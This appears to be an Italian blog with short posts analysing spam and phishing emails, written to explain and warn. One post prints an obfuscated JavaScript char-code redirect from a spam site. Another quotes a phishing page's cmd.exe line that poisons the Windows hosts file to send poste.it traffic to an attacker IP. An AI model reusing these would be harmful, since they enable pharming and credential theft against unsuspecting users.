Stamattina la casella Gmail mi ha presentato un messaggio chiaramente spammoso ma che non era stato filtrato. Il mittente era ungherese, non era inviato in bcc ma a cinque destinatari espliciti, c’era qualche parola con i caratteri modificati (per la cronaca, “sensua| vibe in your re|ationships”); ma soprattutto c’era questo link.
http://www.google.fm/search?q=cache%3Acache%34%79%6F%75%2E%69%6E%66%6F
Lasciate perdere il .fm che è il google micronesiano: funzionerebbe anche con google.com. Tutti i % sono caratteri in esadecimale che dicono di vedere qual è la cache del sito cache4you.info: se uno clicca lì sopra riceve la cache di quel sito, che ha una simpatica funzione javascript che rimanda al sito spammoso vero e proprio. Per la cronaca la funzione converte la stringa qui sotto:
str=”60!105!109!103!32!97!110!100!114!34!61!34!62!34!111!110!101!114!114!111!114!61!39!119!105!110!100!111!119!46!116!111!112!46!108!111!99!97!116!105!111!110!46!104!114!101!102!61!34!104!116!116!112!58!47!47!104!117!103!101!111!101!109!100!105!115!99!111!117!110!116!46!105!110!102!111!34!39!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!115!114!99!61!34!104!116!116!112!58!47!47!108!111!99!97!108!104!111!115!116!47!114!102!103!103!114!101!103!114!101!103!114!101!103!101!114!103!46!106!112!103!34!62!”
Devo dire che l’idea di farsi indicizzare il sito prima e mandare il link alla cache dopo è geniale: in questo modo si fa credere a google che non ci sia nulla di strano nella pagina :-)

Ultimo aggiornamento: 2010-05-20 10:16

Stamattina mi sono arrivati due messaggi di spam: uno su gmail (che non l’ha nemmeno messo nella posta in arrivo) e uno su Tiscali (che mostra sempre tutto, mi chiedo perché mai mi ostino a selezionare come spam i messaggi visto che tanto non ci fanno nulla). Entrambi puntavano allo stesso sito, ma con due nomi diversi: http://www.scatti-privati.com/ e http://www.fotoasorpresa.com/ (l’home page si direbbe “pulita”, il resto non l’ho certo testato).
Il sito in questione si chiama The Final Joke; da una rapida scorsa ai termini di servizio, si direbbe che è nato per ottenere indirizzi di ignari internauti. In futuro non saprei che cosa succederà

Ultimo aggiornamento: 2010-04-29 14:25

Mario mi invia un messaggio di phishing proprio “simpatico” che gli è arrivato (e che gmail fortunatamente mette nello spam).
Il messaggio ha come titolo Autovelox e Tutor: dove sono?, il sedicente mittente è info@auto.it, la provenienza sembra essere dall’IP 192.168.74.6, e racconta di come la polstrada abbia messo un sito dove sono indicate le postazioni degli autovelox (vero). Cosa succede però se si apre il link, che – come forse avete immaginato – NON è al sito della Polizia Stradale?
Il codice HTML di quella pagina contiene tra l’altro queste righe:
<param name='first' value='cmd.exe /c echo 210.86.2.150 poste.it >>
%windir%\System32\drivers\etc\hosts & echo 210.86.2.150 www.poste.it
>> %windir%\System32\drivers\etc\hosts' >
Detto in termini meno criptici: se uno ha un PC con Windows, gira con i privilegi di amministratore, e ha un browser non troppo sveglio (Insomma Etilista) allora la pagina web fa in modo che la prossima volta che il malcapitato vuole andare nel sito www.poste.it sarà automaticamente rediretto al sito 210.86.2.150, che a sua volta (in questo momento, ma il bello della cosa è che possono cambiarlo quando vogliono!) punta a ftp://213.123.204.189/bpol/cartepre/index.html; che cosa faccia questo sito, ve lo lascio immaginare.
Come avrete intuito, la cosa pericolosa è che il phishing vero e proprio arriva in un secondo momento, e quindi l’ignaro utente non si accorge di nulla. Sapevàtelo!

Ultimo aggiornamento: 2010-03-05 11:44

Da uno spam arrivatomi stamattina:
sotto [NOME SITO] potete inserire il testo desiderato, calcolare i costi online ed inviarcelo.
I nostri traduttori sono esclusivamente di madrelingua. Così è garantita una traduzione perfetta.
Veloce - professionale - a prezzo conveniente = [NOME SITO]
Cordiali saluti
Il Vostro team di traduttori
Sì, il testo è in italiano formalmente corretto. Ma io non lo scriverei certo così, e non credo nemmeno un altro madrelingua lo farebbe. O no?
(ah, lo spam afferma di arrivare dalle Seychelles :-) )

Ultimo aggiornamento: 2010-02-16 10:50

tra lo spam odierno — stavolta sulla casella @tin.it — ce n’è uno di tale King Abdullah Bin Abdul Aziz (che dovrebbe essere il re dell’Arabia Saudita), il cui testo inizia con “On Tuesday, a catastrophic earthquake struck near Port-au-Prince, Haiti. The full extent of the damage is still being assessed, but the death toll — already in the thousands — is climbing fast.” e continua con “Our neighbors in Haiti are racing to confront the enormous devastation — and the OFA community can help.“, terminando con “Paid for by Organizing for Saudi Arabia, a project of the Islamic National Committee — 430 South Capitol Street SE, Washington, D.C. 20003. This communication is not authorized by any candidate or candidate’s committee.” che non ho ben capito che tipo di disclaimer sia.
Uno potrebbe anche pensare che questo sia un messaggio legittimo, considerando tra l’altro che non c’è un indirizzo di sito ma solo un recapito telefonico britannico. Ho almeno due motivi per non crederlo: il primo è che appunto c’è un comitato con sede a Washington che fa contattare un numero britannico (e il messaggio è stato spedito da un sito americano. le header dicono vps.carrollstrategies.net); il secondo è la frase “Any Funds given to the good people of Saudi Arabia Here in The UK will be shared amongs Red Cross and all relief agencies.” Croce Rossa, sì, non Mezzaluna Rossa. Un errore da principianti.
(PS: vedi anche qua, col tipo che è andato direttamente a controllare sul sito reale della fondazione. Non posso che concordare col primo commento in quel thread: a certa gente bisognerebbe semplicemente sparargli)

Ultimo aggiornamento: 2010-01-18 13:55

Commento sulla notiziola precedente, la recensione di Complexity. Testo: «Ciao! Ho provato a contattare il blogmaster, ma non ci sono riuscita. Forse così ce la faccio?». Nome: Valeria Martini. Indirizzo email e URL: un sito di scommesse online.
A voi probabilmente non ve ne sarebbe potuto fregare di meno di un commento con un link spammoso nemmeno visibile direttamente. A me dà molto fastidio. E visto che questa è casa mia (e lo sarebbe anche se non pagassi l’hosting) ho eliminato il messaggio (rispondendo alla mittente).

Ultimo aggiornamento: 2010-01-15 09:50

Nello spam di oggi, un messaggio aveva come titolo “GEWINN” e un altro “FÉLICITATIONS ! ! ! VOTRE E-MAIL A ETE TIRER AU SORT” (sì, i titoli erano TUTTI IN MAIUSCOLO). Il secondo messaggio era interessante, perché spiega come mai la Bill Gates Foundation deve spedire le segnalazioni dei tanti soldi vinti dalla Costa d’Avorio: ritirare i soldi a New York diventa sempre più difficile, e quindi hanno iniziato a delegare agenzie in varie parti del mondo… e questa volta era toccato all’Africa. Non garantisco sulla qualità grammaticale del testo, io il francese scritto lo capisco ma non lo conosco. Posso invece assicurarvi che il testo in tedesco del primo messaggio, sedicente mittente Zurich-Sicherheitsfirma S.A . Herr D.M. (sì, solo con le iniziali), indirizzo email indicato @aol.com (!), indirizzo email mittente @terra.es, è più sgrammaticato dello spam in italiano che riceviamo tutti i giorni. Per i germanofoni lascio una chicca: «Your E-Mail gewonnen haben die Summe von EUR.787.000.00»
Detto tutto questo, continuo a chiedermi una cosa. Questi messaggi sono arrivati non all’indirizzo @gmail.com ma a un indirizzo @tiscali.it, dove è difficile immaginare che ci sia molta gente che parli francese o tedesco. Soprattutto il messaggio francese sembra una variante della truffa nigeriana, e quindi mandata a una persona per volta. Fare un po’ di controlli prima no?

Ultimo aggiornamento: 2010-01-14 10:11

Bisogna dire che i tipi che hanno preparato l’ultimo phishing per PosteItaliane sono indubbiamente italiani e probabilmente con qualche conoscenza di legalese, tanto che persino il filtro antispam di Gmail è stato fregato. Una frase come «Le operazioni da Lei effettuate fino ad oggi sono state classificate come “operazioni ad alto rischio” per la suddetta motivazione» è perfettamente in linea con quanto potremmo trovarci scritto in un messaggio della nostra banca; anche la successiva «Nell’impossibilità di Posteitaliane di verificare la veridicità dei Suoi dati la preghiamo di procedere come di seguito descritto.» non è affatto male.
Per fortuna i nostri non hanno conoscenze informatiche decenti. Basti vedere che hanno mandato la mail da 151.23.72.49 all’indirizzo disnet@disnet.it, e che il sito di “autenticazione” era http://digilander.libero.it/posteitalia/ (già rimosso, quelli di Libero sono stati veloci :-) ) Non si può in effetti pretendere tutto dalla vita, no?

Ultimo aggiornamento: 2009-12-29 12:41